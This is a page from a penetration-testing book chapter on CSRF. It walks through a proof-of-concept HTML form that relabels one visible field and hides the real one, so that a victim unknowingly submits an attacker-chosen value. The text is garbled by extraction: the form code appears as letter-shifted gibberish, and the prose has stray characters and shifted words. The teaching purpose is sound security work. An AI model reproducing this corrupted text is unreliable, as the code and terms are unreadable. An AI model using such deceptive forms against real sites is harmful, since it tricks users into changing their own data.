Page 112 - Hands-On Bug Hunting for Penetration Testers
P. 112
CSRF and Insecure Session Authentication Chapter 6
But if the intent is to deceive the target of the CSRF attack into doing what we want d
unwittingly changing Mandella's rank d why are we showing them? Why offer the user a
chance to see or manipulate the OJDL input field at all? See the following:
IUNM
GPSN FODUZQF BQQMJDBUJPO Y XXX GPSN VSMFODPEFE NFUIPE 1045
BDUJPO IUUQ XFCTDBOUFTU DPN DSPTTUSBJOJOH BCPVUZPV QIQ
MBCFM GOBNF MBCFM JOQVU UZQF UFYU WBMVF 8JMMJBN
OBNF GOBNF
MBCFM OJDL MBCFM JOQVU UZQF UFYU WBMVF 1SJWBUF .BOEFMMB
OBNF PUIFS OJDL
MBCFM MOBNF MBCFM JOQVU UZQF UFYU WBMVF .BOEFMMB
OBNF MOBNF
MBCFM TVCNJU MBCFM JOQVU UZQF UFYU WBMVF TVCNJU
OBNF TVCNJU
JOQVU UZQF TVCNJU
WBMVF IUUQ XFCTDBOUFTU DPN DSPTTUSBJOJOH BCPVUZPV QIQ
JOQVU UZQF IJEEFO WBMVF .BKPS .BOEFMMB OBNF OJDL
GPSN
IUNM
In this last snippet, we've changed the name of the PUIFS OJDL input field with the OJDL
label our hapless user is expecting, while making the real OJDL input hiddenbwhich
contains our secret value, the rank we think the major deserves.
Of course, when you're creating a CSRF PoC as part of a bug-report submission, you want
to make sure you're not actually changing or modifying sensitive information (such as a
password or transaction amount), though it can be useful to make a small alteration in
order to illustrate the possible impact of the bug.
Validating Your CSRF PoC
Now that we've created a basic CSRF PoC, we can go about applying it to prove the
presence of a CSRF vulnerability.
[ 97 ]
